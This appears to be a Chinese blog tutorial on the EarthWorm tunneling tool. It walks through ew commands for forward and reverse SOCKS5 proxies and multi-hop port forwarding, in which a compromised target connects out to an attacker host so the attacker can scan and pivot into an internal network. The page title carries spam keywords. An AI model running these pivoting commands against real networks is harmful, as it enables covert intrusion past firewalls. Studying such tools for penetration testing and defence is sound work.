狠狠色丁香婷婷综合尤物/久久精品综合一区二区三区/中国有色金属学报/国产日韩欧美在线观看 - 国产一区二区三区四区五区tv

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

[點晴永久免費OA]EarthWorm(ew):復雜網絡環境下內網穿透、端口轉發及SOCKS5代理工具

admin
2023年10月21日 12:13 本文熱度 2036

導讀

一句話說明:復雜內網下,數據轉發,轉出轉入工具;常用于socks5代理,深度掃描內網;

官方:EarthWorm是一款用于開啟 SOCKS v5 代理服務的工具,基于標準 C 開發,可提供多平臺間的轉接通訊,用于復雜網絡環境下的數據轉發。

零、前言

本文是在學習了下面參考文章的基礎上,基于自己的理解和心得補充了數據流量拓撲圖,這樣更好理解工具的使用場景和記住命令;本文僅作為技術交流。

一、要點先說

1、ew 自身的各個選項用途說明

-l 指定要監聽的本地端口

-d 指定要反彈到的機器ip

-e 指定要反彈到的機器端口

-f 指定要主動連接的機器ip

-g 指定要主動連接的機器端口

-t 指定超時時長,默認為1000

2、正向代理和反向代理用途的區別

正向代理的典型用途是為在防火墻內的局域網客戶端提供訪問Internet的途徑。

反向代理的典型用途是將防火墻后面的服務器提供給Internet用戶訪問。

3、rssocks 啟動的socks5服務,轉發到最后一步必須使用rcsocks接收

4、工具下載地址

http://rootkiter.com/EarthWorm/supportlist/

Program NameDescribeEg
ew_for_Win.exe附件:ew.zip
適用各種Windows系統(X86指令集、X64指令集)Windows7、Windows XP
ew_for_Linux32各常見Linux發行版
(X86 指令集 CPU)Ubuntu(X86)/BT5(X86)
ew_for_linux64各常見Linux發行版
(X64 指令集 CPU)Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64

MacOS系統發行版 (X64 指令集)蘋果PC電腦,蘋果server
ew_for_Arm32常見Arm-Linux系統
HTC New One(Arm-Android)/小米路由器(R1D)

ew_mipsel常見Mips-Linux系統
(Mipsel指令集 CPU)螢石硬盤錄像機、小米mini路由器(R1CM)

二、端口轉發功能

場景一

在攻擊機運行工具,主動連接靶機3389端口,并將靶機的3389映射到攻擊機本地1080端口;達到在攻擊機側訪問本地1080端口,將數據轉發到靶機3389;

./ew -s lcx_tran -l 1080 -f 114.114.114.114 -g 3389

場景二

攻擊機側運行工具,做1080端口轉發本地8080端口,且8080端口接受外部連接;靶機將本地3389端口數據轉發到攻擊機8080端口;
最終形成一條由靶機主動外聯攻擊機,并在靶機與攻擊機形成一條數據轉發通道:攻擊機1080<--------->3389靶機

第一步在本地電腦創建監聽端口8080,防火墻和路由器需要開放本電腦此端口8080的訪問權限:

./ew -s lcx_listen -l 1080 -e 8080

第二步在遠端受控電腦上創建到本地電腦IP-114.114.114.114及端口8080的連接,以及提供訪問的其他電腦IP-10.0.0.1及端口3389(不一定要是此遠端電腦,可以是此遠端電腦能夠訪問到的其他電腦IP和端口):

./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.1 -g 3389

三、socks5代理功能

場景一(正向代理)

在靶機側運行工具監聽1080端口對外提供socks5代理服務;在攻擊機側使用代理工具(例如:proxychains)連接靶機提供的socks5代理服務,繼續滲透掃描內網。

./ew -s ssocksd -l 1080

場景二(反向代理)

靶機側運行工具,本地啟動socks5服務,主動外聯攻擊機8080端口,攻擊機側運行工具,將對外訪問的8080端口與到本地1080端口做映射,進行數據轉發;

第一步在本地電腦創建監聽端口8080,防火墻和路由器需要開放本電腦此端口8080的訪問權限

./ew -s rcsocks -l 1080 -e 8080

第二步在遠端受控電腦上創建到本地電腦IP-114.114.114.114及端口8080的連接

./ew -s rssocks -d 114.114.114.114 -e 8080

場景三(正向代理):

靶機側運行工具啟動socks5服務,邊緣機側運行工具將本地從1080端口收到的數據全部轉發到靶機1086端口,在攻擊機側使用代理工具(例如:proxychains)連接邊緣機提供的1080端口;最終達到攻擊機側與靶機之間形成socks5代理通道,繼續滲透掃描內網。

第一步在遠端靶機10.0.0.2上創建監聽端口1086

./ew -s ssocksd -l 1086

第二步在遠端邊緣機上創建創建端口1080到靶機10.0.0.2端口1086的轉發,防火墻和路由器需要開放遠端邊緣機端口1080的訪問權限

./ew -s lcx_tran -l 1080 -f 10.0.0.2 -g 1086

場景四(反向代理):

靶機側運行工具啟動socks5服務,邊緣機側運行工具連接靶機1086端口并主動外聯攻擊機8080端口;攻擊機側運行工具,對外監聽8080端口,并將數據轉發到本地1080端口;最終實現在攻擊機側1080端口<—>靶機之間形成一條代理通道;

第一步在遠端靶機創建監聽端口1086:

./ew -s ssocksd -l 1086

第二步在本地電腦上創建監聽端口8080:

./ew -s lcx_listen -l 1080 -e 8080

第三步在遠端邊緣機創建到本地電腦的連接:

./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 1086

場景五(反向代理)-復雜型多級聯接

靶機側運行工具本地啟動socks5服務并反向連接中間機7777端口;中間機側運行工具將9999端口與7777端口數據轉發互通;邊緣機側運行工具,通過主動外聯攻擊機8080端口將數據轉發到中間機9999端口;攻擊機側運行工具,對外監聽8080端口,并將數據轉發到本地1080端口;最終實現在攻擊機側1080端口<—>靶機之間形成一條代理通道;

第一步:

./ew -s lcx_listen -l 9999 -e 7777

第二步:

./ew -s rssocks -d 10.0.1.2 -e 7777

第三步:

./ew -s rcsocks -l 1080 -e 8080

第四步:

./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 9999

四、最后說點什么

1、耐下心來

剛開始看到這個工具本想一看而過,后來耐心的學習一下,打開了新世界。

2、動手實踐

看了很多文章也包括官方的文檔;發現對小白來說想了解工具功能和不同場景,單看文字不直觀,沒有網絡拓撲很難理解。所以本著自己邊學習邊記錄邊分享的精神,整理了這篇文章。

3、橫向比較

3.1 還發現了這個作者的另一個好用的工具Termite;目前EW和Termite作者已經不維護了,工具下載方式如下:

#git clone https://github.com/rootkiter/Binary-files.git

#cd Binary-files

#git checkout bd32230

HEAD 目前位于 bd32230 fix ew version

#ls

EarthWorm README.md Termite

其中Termite文件夾下面就是工具;

3.2 然后我在學習Termite的過程中又找到了一個和Termite功能基本一致的工具Venom(地址:https://github.com/Dliv3/Venom),我可以說這兩個工具對我來說可以算是“神器”了!因為本篇重點是介紹EW的使用方法,后面再根據情況,也記錄一下這兩個“神器”工具的使用;

感興趣的小伙伴可以學習一下Termite/Venom,玩起來挺爽。

參考文章:

1、項目主頁

http://rootkiter.com/EarthWorm/附件:EarthWorm-master.zip

2、內網穿透的n種姿勢

https://xz.aliyun.com/t/9454?accounttraceid=69827aec0fbd4da68045e255cee9fd32xlwo

3、EW使用

https://blog.csdn.net/ws13129/article/details/94445378

4、內網滲透入門到放棄之必備殺器

https://www.shangyouw.cn/win7/arc36509.html

5、Termite官方介紹說明

http://rootkiter.com/Termite/

http://rootkiter.com/Termite/README.txt

https://github.com/rootkiter/Termite

6、Venom官方介紹說明

https://github.com/Dliv3/Venom


該文章在 2023/10/21 16:58:18 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved